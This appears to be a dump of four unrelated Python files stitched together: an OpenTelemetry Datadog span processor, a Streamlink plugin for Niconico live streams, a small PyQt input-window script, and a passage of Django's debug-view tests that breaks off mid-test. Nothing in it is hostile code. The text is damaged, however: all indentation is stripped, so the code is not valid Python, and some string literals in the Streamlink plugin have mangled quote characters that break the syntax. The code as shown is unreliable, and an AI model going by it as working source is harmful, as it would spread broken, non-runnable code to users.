|
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import logging
import threading
import typing
from opentelemetry.context import Context, attach, detach, set_value
from opentelemetry.sdk.trace import Span, SpanProcessor
from opentelemetry.sdk.trace.export import SpanExporter
from opentelemetry.trace import INVALID_TRACE_ID
from opentelemetry.util._time import _time_ns
logger = logging.getLogger(__name__)
class DatadogExportSpanProcessor(SpanProcessor):
"""Datadog exporter span processor
DatadogExportSpanProcessor is an implementation of `SpanProcessor` that
batches all opened spans into a list per trace. When all spans for a trace
are ended, the trace is queues up for export. This is required for exporting
to the Datadog Agent which expects to received list of spans for each trace.
"""
_FLUSH_TOKEN = INVALID_TRACE_ID
def __init__(
self,
span_exporter: SpanExporter,
schedule_delay_millis: float = 5000,
max_trace_size: int = 4096,
):
if max_trace_size <= 0:
raise ValueError("max_queue_size must be a positive integer.")
if schedule_delay_millis <= 0:
raise ValueError("schedule_delay_millis must be positive.")
self.span_exporter = span_exporter
# queue trace_ids for traces with recently ended spans for worker thread to check
# for exporting
self.check_traces_queue = (
collections.deque()
) # type: typing.Deque[int]
self.traces_lock = threading.Lock()
# dictionary of trace_ids to a list of spans where the first span is the
# first opened span for the trace
self.traces = collections.defaultdict(list)
# counter to keep track of the number of spans and ended spans for a
# trace_id
self.traces_spans_count = collections.Counter()
self.traces_spans_ended_count = collections.Counter()
self.worker_thread = threading.Thread(target=self.worker, daemon=True)
# threading conditions used for flushing and shutdown
self.condition = threading.Condition(threading.Lock())
self.flush_condition = threading.Condition(threading.Lock())
# flag to indicate that there is a flush operation on progress
self._flushing = False
self.max_trace_size = max_trace_size
self._spans_dropped = False
self.schedule_delay_millis = schedule_delay_millis
self.done = False
self.worker_thread.start()
def on_start(
self, span: Span, parent_context: typing.Optional[Context] = None
) -> None:
ctx = span.get_span_context()
trace_id = ctx.trace_id
with self.traces_lock:
# check upper bound on number of spans for trace before adding new
# span
if self.traces_spans_count[trace_id] == self.max_trace_size:
logger.warning("Max spans for trace, spans will be dropped.")
self._spans_dropped = True
return
# add span to end of list for a trace and update the counter
self.traces[trace_id].append(span)
self.traces_spans_count[trace_id] += 1
def on_end(self, span: Span) -> None:
if self.done:
logger.warning("Already shutdown, dropping span.")
return
ctx = span.get_span_context()
trace_id = ctx.trace_id
with self.traces_lock:
self.traces_spans_ended_count[trace_id] += 1
if self.is_trace_exportable(trace_id):
self.check_traces_queue.appendleft(trace_id)
def worker(self):
timeout = self.schedule_delay_millis / 1e3
while not self.done:
if not self._flushing:
with self.condition:
self.condition.wait(timeout)
if not self.check_traces_queue:
# spurious notification, let's wait again, reset timeout
timeout = self.schedule_delay_millis / 1e3
continue
if self.done:
# missing spans will be sent when calling flush
break
# substract the duration of this export call to the next timeout
start = _time_ns()
self.export()
end = _time_ns()
duration = (end - start) / 1e9
timeout = self.schedule_delay_millis / 1e3 - duration
# be sure that all spans are sent
self._drain_queue()
def is_trace_exportable(self, trace_id):
return (
self.traces_spans_count[trace_id]
- self.traces_spans_ended_count[trace_id]
<= 0
)
def export(self) -> None:
"""Exports traces with finished spans."""
notify_flush = False
export_trace_ids = []
while self.check_traces_queue:
trace_id = self.check_traces_queue.pop()
if trace_id is self._FLUSH_TOKEN:
notify_flush = True
else:
with self.traces_lock:
# check whether trace is exportable again in case that new
# spans were started since we last concluded trace was
# exportable
if self.is_trace_exportable(trace_id):
export_trace_ids.append(trace_id)
del self.traces_spans_count[trace_id]
del self.traces_spans_ended_count[trace_id]
if len(export_trace_ids) > 0:
token = attach(set_value("suppress_instrumentation", True))
for trace_id in export_trace_ids:
with self.traces_lock:
try:
# Ignore type b/c the Optional[None]+slicing is too "clever"
# for mypy
self.span_exporter.export(self.traces[trace_id]) # type: ignore
# pylint: disable=broad-except
except Exception:
logger.exception(
"Exception while exporting Span batch."
)
finally:
del self.traces[trace_id]
detach(token)
if notify_flush:
with self.flush_condition:
self.flush_condition.notify()
def _drain_queue(self):
"""Export all elements until queue is empty.
Can only be called from the worker thread context because it invokes
`export` that is not thread safe.
"""
while self.check_traces_queue:
self.export()
def force_flush(self, timeout_millis: int = 30000) -> bool:
if self.done:
logger.warning("Already shutdown, ignoring call to force_flush().")
return True
self._flushing = True
self.check_traces_queue.appendleft(self._FLUSH_TOKEN)
# wake up worker thread
with self.condition:
self.condition.notify_all()
# wait for token to be processed
with self.flush_condition:
ret = self.flush_condition.wait(timeout_millis / 1e3)
self._flushing = False
if not ret:
logger.warning("Timeout was exceeded in force_flush().")
return ret
def shutdown(self) -> None:
# signal the worker thread to finish and then wait for it
self.done = True
with self.condition:
self.condition.notify_all()
self.worker_thread.join()
self.span_exporter.shutdown()
|
nicolive.py
|
import json
import logging
import re
import threading
import time
from urllib.parse import unquote_plus, urlparse
import websocket
from streamlink.plugin import Plugin, PluginArgument, PluginArguments
from streamlink.plugin.api import useragents
from streamlink.stream import HLSStream
_log = logging.getLogger(__name__)
_url_re = re.compile(
r"^https?://(?P<domain>live[0-9]*\.nicovideo\.jp)/watch/lv[0-9]*")
_login_url = "https://account.nicovideo.jp/login/redirector"
_login_url_params = {
"show_button_twitter": 1,
"show_button_facebook": 1,
"next_url": "/"}
class NicoLive(Plugin):
arguments = PluginArguments(
PluginArgument(
"email",
argument_name="niconico-email",
sensitive=True,
metavar="EMAIL",
help="The email or phone number associated with your "
"Niconico account"),
PluginArgument(
"password",
argument_name="niconico-password",
sensitive=True,
metavar="PASSWORD",
help="The password of your Niconico account"),
PluginArgument(
"user-session",
argument_name="niconico-user-session",
sensitive=True,
metavar="VALUE",
help="Value of the user-session token \n(can be used in "
"case you do not want to put your password here)"))
is_stream_ready = False
is_stream_ended = False
watching_interval = 30
watching_interval_worker_thread = None
stream_reader = None
_ws = None
frontend_id = None
@classmethod
def can_handle_url(cls, url):
return _url_re.match(url) is not None
def _get_streams(self):
self.url = self.url.split("?")[0]
self.session.http.headers.update({
"User-Agent": useragents.CHROME,
})
if not self.get_wss_api_url():
_log.debug("Coundn't extract wss_api_url. Attempting login...")
if not self.niconico_web_login():
return None
if not self.get_wss_api_url():
_log.error("Failed to get wss_api_url.")
_log.error(
"Please check if the URL is correct, "
"and make sure your account has access to the video.")
return None
self.api_connect(self.wss_api_url)
i = 0
while not self.is_stream_ready:
if i % 10 == 0:
_log.debug("Waiting for permit...")
if i == 600:
_log.error("Waiting for permit timed out.")
return None
if self.is_stream_ended:
return None
time.sleep(0.1)
i += 1
streams = HLSStream.parse_variant_playlist(
self.session, self.hls_stream_url)
nico_streams = {}
for s in streams:
nico_stream = NicoHLSStream(streams[s], self)
nico_streams[s] = nico_stream
return nico_streams
def get_wss_api_url(self):
_log.debug("Getting video page: {0}".format(self.url))
resp = self.session.http.get(self.url)
try:
self.wss_api_url = extract_text(
resp.text, ""webSocketUrl":"", """)
if not self.wss_api_url:
return False
except Exception as e:
_log.debug(e)
_log.debug("Failed to extract wss api url")
return False
try:
self.frontend_id = extract_text(
resp.text, ""frontendId":", ","")
except Exception as e:
_log.debug(e)
_log.warning("Failed to extract frontend id")
self.wss_api_url = "{0}&frontend_id={1}".format(self.wss_api_url, self.frontend_id)
_log.debug("Video page response code: {0}".format(resp.status_code))
_log.trace("Video page response body: {0}".format(resp.text))
_log.debug("Got wss_api_url: {0}".format(self.wss_api_url))
_log.debug("Got frontend_id: {0}".format(self.frontend_id))
return self.wss_api_url.startswith("wss://")
def api_on_open(self):
self.send_playerversion()
require_new_stream = not self.is_stream_ready
self.send_getpermit(require_new_stream=require_new_stream)
def api_on_error(self, ws, error=None):
if error:
_log.warning(error)
_log.warning("wss api disconnected.")
_log.warning("Attempting to reconnect in 5 secs...")
time.sleep(5)
self.api_connect(self.wss_api_url)
def api_connect(self, url):
# Proxy support adapted from the UStreamTV plugin (ustreamtv.py)
proxy_url = self.session.get_option("https-proxy")
if proxy_url is None:
proxy_url = self.session.get_option("http-proxy")
proxy_options = parse_proxy_url(proxy_url)
if proxy_options.get('http_proxy_host'):
_log.debug("Using proxy ({0}://{1}:{2})".format(
proxy_options.get('proxy_type') or "http",
proxy_options.get('http_proxy_host'),
proxy_options.get('http_proxy_port') or 80))
_log.debug("Connecting: {0}".format(url))
self._ws = websocket.WebSocketApp(
url,
header=["User-Agent: {0}".format(useragents.CHROME)],
on_open=self.api_on_open,
on_message=self.handle_api_message,
on_error=self.api_on_error)
self.ws_worker_thread = threading.Thread(
target=self._ws.run_forever,
args=proxy_options)
self.ws_worker_thread.daemon = True
self.ws_worker_thread.start()
def send_message(self, type_, body):
msg = {"type": type_, "body": body}
msg_json = json.dumps(msg)
_log.debug(f"Sending: {msg_json}")
if self._ws and self._ws.sock.connected:
self._ws.send(msg_json)
else:
_log.warning("wss api is not connected.")
def send_no_body_message(self, type_):
msg = {"type": type_}
msg_json = json.dumps(msg)
_log.debug(f"Sending: {msg_json}")
if self._ws and self._ws.sock.connected:
self._ws.send(msg_json)
else:
_log.warning("wss api is not connected.")
def send_custom_message(self, msg):
msg_json = json.dumps(msg)
_log.debug(f"Sending: {msg_json}")
if self._ws and self._ws.sock.connected:
self._ws.send(msg_json)
else:
_log.warning("wss api is not connected.")
def send_playerversion(self):
body = {
"type": "startWatching",
"data": {
"stream": {
"quality": "abr",
"protocol": "hls",
"latency": "high",
"chasePlay": False
},
"room": {
"protocol": "webSocket",
"commentable": True
},
"reconnect": False
}
}
self.send_custom_message(body)
def send_getpermit(self, require_new_stream=True):
body = {
"type": "getAkashic",
"data": {
"chasePlay": False
}
}
self.send_custom_message(body)
def send_watching(self):
body = {
"command": "watching",
"params": [self.broadcast_id, "-1", "0"]
}
self.send_message("watch", body)
def send_pong(self):
self.send_no_body_message("pong")
self.send_no_body_message("keepSeat")
def handle_api_message(self, message):
_log.debug(f"Received: {message}")
message_parsed = json.loads(message)
if message_parsed["type"] == "stream":
data = message_parsed["data"]
self.hls_stream_url = data["uri"]
self.is_stream_ready = True
if message_parsed["type"] == "watch":
body = message_parsed["body"]
command = body["command"]
if command == "currentstream":
current_stream = body["currentStream"]
self.hls_stream_url = current_stream["uri"]
self.is_stream_ready = True
elif command == "watchinginterval":
self.watching_interval = int(body["params"][0])
_log.debug("Got watching_interval: {0}".format(
self.watching_interval))
if self.watching_interval_worker_thread is None:
_log.debug("send_watching_scheduler starting.")
self.watching_interval_worker_thread = threading.Thread(
target=self.send_watching_scheduler)
self.watching_interval_worker_thread.daemon = True
self.watching_interval_worker_thread.start()
else:
_log.debug("send_watching_scheduler already running.")
elif command == "disconnect":
_log.info("Websocket API closed.")
_log.info("Stream ended.")
self.is_stream_ended = True
if self.stream_reader is not None:
self.stream_reader.close()
_log.info("Stream reader closed.")
elif message_parsed["type"] == "ping":
self.send_pong()
def send_watching_scheduler(self):
"""
Periodically send "watching" command to the API.
This is necessary to keep the session alive.
"""
while not self.is_stream_ended:
self.send_watching()
time.sleep(self.watching_interval)
def niconico_web_login(self):
user_session = self.get_option("user-session")
email = self.get_option("email")
password = self.get_option("password")
if user_session is not None:
_log.info("User session cookie is provided. Using it.")
self.session.http.cookies.set(
"user_session",
user_session,
path="/",
domain="nicovideo.jp")
self.save_cookies()
return True
elif email is not None and password is not None:
_log.info("Email and password are provided. Attemping login.")
payload = {"mail_tel": email, "password": password}
resp = self.session.http.post(_login_url, data=payload,
params=_login_url_params)
_log.debug("Login response code: {0}".format(resp.status_code))
_log.trace("Login response body: {0}".format(resp.text))
_log.debug("Cookies: {0}".format(
self.session.http.cookies.get_dict()))
if self.session.http.cookies.get("user_session") is None:
try:
msg = extract_text(
resp.text, '<p class="notice__text">', "</p>")
except Exception as e:
_log.debug(e)
msg = "unknown reason"
_log.warning("Login failed. {0}".format(msg))
return False
else:
_log.info("Logged in.")
self.save_cookies()
return True
else:
_log.warning(
"Neither a email and password combination nor a user session "
"token is provided. Cannot attempt login.")
return False
class NicoHLSStream(HLSStream):
def __init__(self, hls_stream, nicolive_plugin):
super().__init__(
hls_stream.session,
force_restart=hls_stream.force_restart,
start_offset=hls_stream.start_offset,
duration=hls_stream.duration,
**hls_stream.args)
# url is already in hls_stream.args
self.nicolive_plugin = nicolive_plugin
def open(self):
reader = super().open()
self.nicolive_plugin.stream_reader = reader
return reader
def extract_text(text, left, right):
"""Extract text from HTML"""
result = re.findall("{0}(.*?){1}".format(left, right), text)
if len(result) != 1:
raise Exception("Failed to extract string. "
"Expected 1, found {0}".format(len(result)))
return result[0]
def parse_proxy_url(purl):
"""Adapted from UStreamTV plugin (ustreamtv.py)"""
proxy_options = {}
if purl:
p = urlparse(purl)
proxy_options['proxy_type'] = p.scheme
proxy_options['http_proxy_host'] = p.hostname
if p.port:
proxy_options['http_proxy_port'] = p.port
if p.username:
proxy_options['http_proxy_auth'] = \
(unquote_plus(p.username), unquote_plus(p.password or ""))
return proxy_options
__plugin__ = NicoLive
|
app_win.py
|
#!/usr/bin/env python3
import threading
import sys
import queue
from PyQt5 import QtWidgets
from app_win_frm import *
global mesg_q
mesg_q = queue.Queue()
global Quitting
Quitting = False
def worker(mesg_q=mesg_q):
app = QtWidgets.QApplication(sys.argv)
window = QtWidgets.QMainWindow()
ui = Ui_window()
ui.setupUi(window)
def cmdOk_Click():
print(ui.txtName.text(), flush=True)
ui.cmdOk.clicked.connect(cmdOk_Click)
window.move(0, 0)
window.show()
def onCloseWindow():
Quitting = True
app.quit()
sys.exit(0)
window.destroyed.connect(onCloseWindow)
def MsgAction(TextRcv):
ui.txtName.setText(TextRcv)
def ChkInputs():
if Quitting:
ui.tmrTimer.stop()
else:
if not mesg_q.empty():
MsgAction(mesg_q.get())
ui.tmrTimer = QtCore.QTimer()
ui.tmrTimer.setInterval(50)
ui.tmrTimer.timeout.connect(ChkInputs)
ui.tmrTimer.start()
sys.exit(app.exec_())
WindowThd = threading.Thread(target=worker)
# WindowThd.daemon = True
WindowThd.start()
line = ""
while not Quitting:
line = input()
if line != "":
mesg_q.put(line)
line = ""
|
test_debug.py
|
import importlib
import inspect
import os
import re
import sys
import tempfile
import threading
from io import StringIO
from pathlib import Path
from unittest import mock
from django.core import mail
from django.core.files.uploadedfile import SimpleUploadedFile
from django.db import DatabaseError, connection
from django.shortcuts import render
from django.template import TemplateDoesNotExist
from django.test import RequestFactory, SimpleTestCase, override_settings
from django.test.utils import LoggingCaptureMixin
from django.urls import path, reverse
from django.utils.functional import SimpleLazyObject
from django.utils.safestring import mark_safe
from django.views.debug import (
CLEANSED_SUBSTITUTE, CallableSettingWrapper, ExceptionReporter,
Path as DebugPath, cleanse_setting, default_urlconf,
technical_404_response, technical_500_response,
)
from ..views import (
custom_exception_reporter_filter_view, index_page,
multivalue_dict_key_error, non_sensitive_view, paranoid_view,
sensitive_args_function_caller, sensitive_kwargs_function_caller,
sensitive_method_view, sensitive_view,
)
class User:
def __str__(self):
return 'jacob'
class WithoutEmptyPathUrls:
urlpatterns = [path('url/', index_page, name='url')]
class CallableSettingWrapperTests(SimpleTestCase):
""" Unittests for CallableSettingWrapper
"""
def test_repr(self):
class WrappedCallable:
def __repr__(self):
return "repr from the wrapped callable"
def __call__(self):
pass
actual = repr(CallableSettingWrapper(WrappedCallable()))
self.assertEqual(actual, "repr from the wrapped callable")
@override_settings(DEBUG=True, ROOT_URLCONF='view_tests.urls')
class DebugViewTests(SimpleTestCase):
def test_files(self):
with self.assertLogs('django.request', 'ERROR'):
response = self.client.get('/raises/')
self.assertEqual(response.status_code, 500)
data = {
'file_data.txt': SimpleUploadedFile('file_data.txt', b'haha'),
}
with self.assertLogs('django.request', 'ERROR'):
response = self.client.post('/raises/', data)
self.assertContains(response, 'file_data.txt', status_code=500)
self.assertNotContains(response, 'haha', status_code=500)
def test_400(self):
# When DEBUG=True, technical_500_template() is called.
with self.assertLogs('django.security', 'WARNING'):
response = self.client.get('/raises400/')
self.assertContains(response, '<div class="context" id="', status_code=400)
# Ensure no 403.html template exists to test the default case.
@override_settings(TEMPLATES=[{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
}])
def test_403(self):
response = self.client.get('/raises403/')
self.assertContains(response, '<h1>403 Forbidden</h1>', status_code=403)
# Set up a test 403.html template.
@override_settings(TEMPLATES=[{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'OPTIONS': {
'loaders': [
('django.template.loaders.locmem.Loader', {
'403.html': 'This is a test template for a 403 error ({{ exception }}).',
}),
],
},
}])
def test_403_template(self):
response = self.client.get('/raises403/')
self.assertContains(response, 'test template', status_code=403)
self.assertContains(response, '(Insufficient Permissions).', status_code=403)
def test_404(self):
response = self.client.get('/raises404/')
self.assertEqual(response.status_code, 404)
self.assertContains(response, "<code>not-in-urls</code>, didn't match", status_code=404)
def test_404_not_in_urls(self):
response = self.client.get('/not-in-urls')
self.assertNotContains(response, "Raised by:", status_code=404)
self.assertContains(response, "Django tried these URL patterns", status_code=404)
self.assertContains(response, "<code>not-in-urls</code>, didn't match", status_code=404)
# Pattern and view name of a RegexURLPattern appear.
self.assertContains(response, r"^regex-post/(?P<pk>[0-9]+)/$", status_code=404)
self.assertContains(response, "[name='regex-post']", status_code=404)
# Pattern and view name of a RoutePattern appear.
self.assertContains(response, r"path-post/<int:pk>/", status_code=404)
self.assertContains(response, "[name='path-post']", status_code=404)
@override_settings(ROOT_URLCONF=WithoutEmptyPathUrls)
def test_404_empty_path_not_in_urls(self):
response = self.client.get('/')
self.assertContains(response, "The empty path didn't match any of these.", status_code=404)
def test_technical_404(self):
response = self.client.get('/technical404/')
self.assertContains(response, "Raised by:", status_code=404)
self.assertContains(response, "view_tests.views.technical404", status_code=404)
def test_classbased_technical_404(self):
response = self.client.get('/classbased404/')
self.assertContains(response, "Raised by:", status_code=404)
self.assertContains(response, "view_tests.views.Http404View", status_code=404)
def test_non_l10ned_numeric_ids(self):
"""
Numeric IDs and fancy traceback context blocks line numbers shouldn't be localized.
"""
with self.settings(DEBUG=True, USE_L10N=True):
with self.assertLogs('django.request', 'ERROR'):
response = self.client.get('/raises500/')
# We look for a HTML fragment of the form
# '<div class="context" id="c38123208">', not '<div class="context" id="c38,123,208"'
self.assertContains(response, '<div class="context" id="', status_code=500)
match = re.search(b'<div class="context" id="(?P<id>[^"]+)">', response.content)
self.assertIsNotNone(match)
id_repr = match.group('id')
self.assertFalse(
re.search(b'[^c0-9]', id_repr),
"Numeric IDs in debug response HTML page shouldn't be localized (value: %s)." % id_repr.decode()
)
def test_template_exceptions(self):
with self.assertLogs('django.request', 'ERROR'):
try:
self.client.get(reverse('template_exception'))
except Exception:
raising_loc = inspect.trace()[-1][-2][0].strip()
self.assertNotEqual(
raising_loc.find("raise Exception('boom')"), -1,
"Failed to find 'raise Exception' in last frame of "
"traceback, instead found: %s" % raising_loc
)
def test_template_loader_postmortem(self):
"""Tests for not existing file"""
template_name = "notfound.html"
with tempfile.NamedTemporaryFile(prefix=template_name) as tmpfile:
tempdir = os.path.dirname(tmpfile.name)
template_path = os.path.join(tempdir, template_name)
with override_settings(TEMPLATES=[{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [tempdir],
}]), self.assertLogs('django.request', 'ERROR'):
response = self.client.get(reverse('raises_template_does_not_exist', kwargs={"path": template_name}))
self.assertContains(response, "%s (Source does not exist)" % template_path, status_code=500, count=2)
# Assert as HTML.
self.assertContains(
response,
'<li><code>django.template.loaders.filesystem.Loader</code>: '
'%s (Source does not exist)</li>' % os.path.join(tempdir, 'notfound.html'),
status_code=500,
html=True,
)
def test_no_template_source_loaders(self):
"""
Make sure if you don't specify a template, the debug view doesn't blow up.
"""
with self.assertLogs('django.request', 'ERROR'):
with self.assertRaises(TemplateDoesNotExist):
self.client.get('/render_no_template/')
@override_settings(ROOT_URLCONF='view_tests.default_urls')
def test_default_urlconf_template(self):
"""
Make sure that the default URLconf template is shown shown instead
of the technical 404 page, if the user has not altered their
URLconf yet.
"""
response = self.client.get('/')
self.assertContains(
response,
"<h2>The install worked successfully! Congratulations!</h2>"
)
@override_settings(ROOT_URLCONF='view_tests.regression_21530_urls')
def test_regression_21530(self):
"""
Regression test for bug #21530.
If the admin app include is replaced with exactly one url
pattern, then the technical 404 template should be displayed.
The bug here was that an AttributeError caused a 500 response.
"""
response = self.client.get('/')
self.assertContains(
response,
"Page not found <span>(404)</span>",
status_code=404
)
def test_template_encoding(self):
"""
The templates are loaded directly, not via a template loader, and
should be opened as utf-8 charset as is the default specified on
template engines.
"""
with mock.patch.object(DebugPath, 'open') as m:
default_urlconf(None)
m.assert_called_once_with(encoding='utf-8')
m.reset_mock()
technical_404_response(mock.MagicMock(), mock.Mock())
m.assert_called_once_with(encoding='utf-8')
class DebugViewQueriesAllowedTests(SimpleTestCase):
# May need a query to initialize MySQL connection
databases = {'default'}
def test_handle_db_exception(self):
"""
Ensure the debug view works when a database exception is raised by
performing an invalid query and passing the exception to the debug view.
"""
with connection.cursor() as cursor:
try:
cursor.execute('INVALID SQL')
except DatabaseError:
exc_info = sys.exc_info()
rf = RequestFactory()
response = technical_500_response(rf.get('/'), *exc_info)
self.assertContains(response, 'OperationalError at /', status_code=500)
@override_settings(
DEBUG=True,
ROOT_URLCONF='view_tests.urls',
# No template directories are configured, so no templates will be found.
TEMPLATES=[{
'BACKEND': 'django.template.backends.dummy.TemplateStrings',
}],
)
class NonDjangoTemplatesDebugViewTests(SimpleTestCase):
def test_400(self):
# When DEBUG=True, technical_500_template() is called.
with self.assertLogs('django.security', 'WARNING'):
response = self.client.get('/raises400/')
self.assertContains(response, '<div class="context" id="', status_code=400)
def test_403(self):
response = self.client.get('/raises403/')
self.assertContains(response, '<h1>403 Forbidden</h1>', status_code=403)
def test_404(self):
response = self.client.get('/raises404/')
self.assertEqual(response.status_code, 404)
def test_template_not_found_error(self):
# Raises a TemplateDoesNotExist exception and shows the debug view.
url = reverse('raises_template_does_not_exist', kwargs={"path": "notfound.html"})
with self.assertLogs('django.request', 'ERROR'):
response = self.client.get(url)
self.assertContains(response, '<div class="context" id="', status_code=500)
class ExceptionReporterTests(SimpleTestCase):
rf = RequestFactory()
def test_request_and_exception(self):
"A simple exception report can be generated"
try:
request = self.rf.get('/test_view/')
request.user = User()
raise ValueError("Can't find my keys")
except ValueError:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertInHTML('<h1>ValueError at /test_view/</h1>', html)
self.assertIn('<pre class="exception_value">Can't find my keys</pre>', html)
self.assertIn('<th>Request Method:</th>', html)
self.assertIn('<th>Request URL:</th>', html)
self.assertIn('<h3 id="user-info">USER</h3>', html)
self.assertIn('<p>jacob</p>', html)
self.assertIn('<th>Exception Type:</th>', html)
self.assertIn('<th>Exception Value:</th>', html)
self.assertIn('<h2>Traceback ', html)
self.assertIn('<h2>Request information</h2>', html)
self.assertNotIn('<p>Request data not supplied</p>', html)
self.assertIn('<p>No POST data</p>', html)
def test_no_request(self):
"An exception report can be generated without request"
try:
raise ValueError("Can't find my keys")
except ValueError:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertInHTML('<h1>ValueError</h1>', html)
self.assertIn('<pre class="exception_value">Can't find my keys</pre>', html)
self.assertNotIn('<th>Request Method:</th>', html)
self.assertNotIn('<th>Request URL:</th>', html)
self.assertNotIn('<h3 id="user-info">USER</h3>', html)
self.assertIn('<th>Exception Type:</th>', html)
self.assertIn('<th>Exception Value:</th>', html)
self.assertIn('<h2>Traceback ', html)
self.assertIn('<h2>Request information</h2>', html)
self.assertIn('<p>Request data not supplied</p>', html)
def test_eol_support(self):
"""The ExceptionReporter supports Unix, Windows and Macintosh EOL markers"""
LINES = ['print %d' % i for i in range(1, 6)]
reporter = ExceptionReporter(None, None, None, None)
for newline in ['\n', '\r\n', '\r']:
fd, filename = tempfile.mkstemp(text=False)
os.write(fd, (newline.join(LINES) + newline).encode())
os.close(fd)
try:
self.assertEqual(
reporter._get_lines_from_file(filename, 3, 2),
(1, LINES[1:3], LINES[3], LINES[4:])
)
finally:
os.unlink(filename)
def test_no_exception(self):
"An exception report can be generated for just a request"
request = self.rf.get('/test_view/')
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertInHTML('<h1>Report at /test_view/</h1>', html)
self.assertIn('<pre class="exception_value">No exception message supplied</pre>', html)
self.assertIn('<th>Request Method:</th>', html)
self.assertIn('<th>Request URL:</th>', html)
self.assertNotIn('<th>Exception Type:</th>', html)
self.assertNotIn('<th>Exception Value:</th>', html)
self.assertNotIn('<h2>Traceback ', html)
self.assertIn('<h2>Request information</h2>', html)
self.assertNotIn('<p>Request data not supplied</p>', html)
def test_reporting_of_nested_exceptions(self):
request = self.rf.get('/test_view/')
try:
try:
raise AttributeError(mark_safe('<p>Top level</p>'))
except AttributeError as explicit:
try:
raise ValueError(mark_safe('<p>Second exception</p>')) from explicit
except ValueError:
raise IndexError(mark_safe('<p>Final exception</p>'))
except Exception:
# Custom exception handler, just pass it into ExceptionReporter
exc_type, exc_value, tb = sys.exc_info()
explicit_exc = 'The above exception ({0}) was the direct cause of the following exception:'
implicit_exc = 'During handling of the above exception ({0}), another exception occurred:'
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
# Both messages are twice on page -- one rendered as html,
# one as plain text (for pastebin)
self.assertEqual(2, html.count(explicit_exc.format('<p>Top level</p>')))
self.assertEqual(2, html.count(implicit_exc.format('<p>Second exception</p>')))
self.assertEqual(10, html.count('<p>Final exception</p>'))
text = reporter.get_traceback_text()
self.assertIn(explicit_exc.format('<p>Top level</p>'), text)
self.assertIn(implicit_exc.format('<p>Second exception</p>'), text)
self.assertEqual(3, text.count('<p>Final exception</p>'))
def test_reporting_frames_without_source(self):
try:
source = "def funcName():\n raise Error('Whoops')\nfuncName()"
namespace = {}
code = compile(source, 'generated', 'exec')
exec(code, namespace)
except Exception:
exc_type, exc_value, tb = sys.exc_info()
request = self.rf.get('/test_view/')
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
frames = reporter.get_traceback_frames()
last_frame = frames[-1]
self.assertEqual(last_frame['context_line'], '<source code not available>')
self.assertEqual(last_frame['filename'], 'generated')
self.assertEqual(last_frame['function'], 'funcName')
self.assertEqual(last_frame['lineno'], 2)
html = reporter.get_traceback_html()
self.assertIn('generated in funcName', html)
text = reporter.get_traceback_text()
self.assertIn('"generated" in funcName', text)
def test_reporting_frames_for_cyclic_reference(self):
try:
def test_func():
try:
raise RuntimeError('outer') from RuntimeError('inner')
except RuntimeError as exc:
raise exc.__cause__
test_func()
except Exception:
exc_type, exc_value, tb = sys.exc_info()
request = self.rf.get('/test_view/')
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
def generate_traceback_frames(*args, **kwargs):
nonlocal tb_frames
tb_frames = reporter.get_traceback_frames()
tb_frames = None
tb_generator = threading.Thread(target=generate_traceback_frames, daemon=True)
tb_generator.start()
tb_generator.join(timeout=5)
if tb_generator.is_alive():
# tb_generator is a daemon that runs until the main thread/process
# exits. This is resource heavy when running the full test suite.
# Setting the following values to None makes
# reporter.get_traceback_frames() exit early.
exc_value.__traceback__ = exc_value.__context__ = exc_value.__cause__ = None
tb_generator.join()
self.fail('Cyclic reference in Exception Reporter.get_traceback_frames()')
if tb_frames is None:
# can happen if the thread generating traceback got killed
# or exception while generating the traceback
self.fail('Traceback generation failed')
last_frame = tb_frames[-1]
self.assertIn('raise exc.__cause__', last_frame['context_line'])
self.assertEqual(last_frame['filename'], __file__)
self.assertEqual(last_frame['function'], 'test_func')
def test_request_and_message(self):
"A message can be provided in addition to a request"
request = self.rf.get('/test_view/')
reporter = ExceptionReporter(request, None, "I'm a little teapot", None)
html = reporter.get_traceback_html()
self.assertInHTML('<h1>Report at /test_view/</h1>', html)
self.assertIn('<pre class="exception_value">I'm a little teapot</pre>', html)
self.assertIn('<th>Request Method:</th>', html)
self.assertIn('<th>Request URL:</th>', html)
self.assertNotIn('<th>Exception Type:</th>', html)
self.assertNotIn('<th>Exception Value:</th>', html)
self.assertNotIn('<h2>Traceback ', html)
self.assertIn('<h2>Request information</h2>', html)
self.assertNotIn('<p>Request data not supplied</p>', html)
def test_message_only(self):
reporter = ExceptionReporter(None, None, "I'm a little teapot", None)
html = reporter.get_traceback_html()
self.assertInHTML('<h1>Report</h1>', html)
self.assertIn('<pre class="exception_value">I'm a little teapot</pre>', html)
self.assertNotIn('<th>Request Method:</th>', html)
self.assertNotIn('<th>Request URL:</th>', html)
self.assertNotIn('<th>Exception Type:</th>', html)
self.assertNotIn('<th>Exception Value:</th>', html)
self.assertNotIn('<h2>Traceback ', html)
self.assertIn('<h2>Request information</h2>', html)
self.assertIn('<p>Request data not supplied</p>', html)
def test_non_utf8_values_handling(self):
"Non-UTF-8 exceptions/values should not make the output generation choke."
try:
class NonUtf8Output(Exception):
def __repr__(self):
return b'EXC\xe9EXC'
somevar = b'VAL\xe9VAL' # NOQA
raise NonUtf8Output()
except Exception:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertIn('VAL\\xe9VAL', html)
self.assertIn('EXC\\xe9EXC', html)
def test_local_variable_escaping(self):
"""Safe strings in local variables are escaped."""
try:
local = mark_safe('<p>Local variable</p>')
raise ValueError(local)
except Exception:
exc_type, exc_value, tb = sys.exc_info()
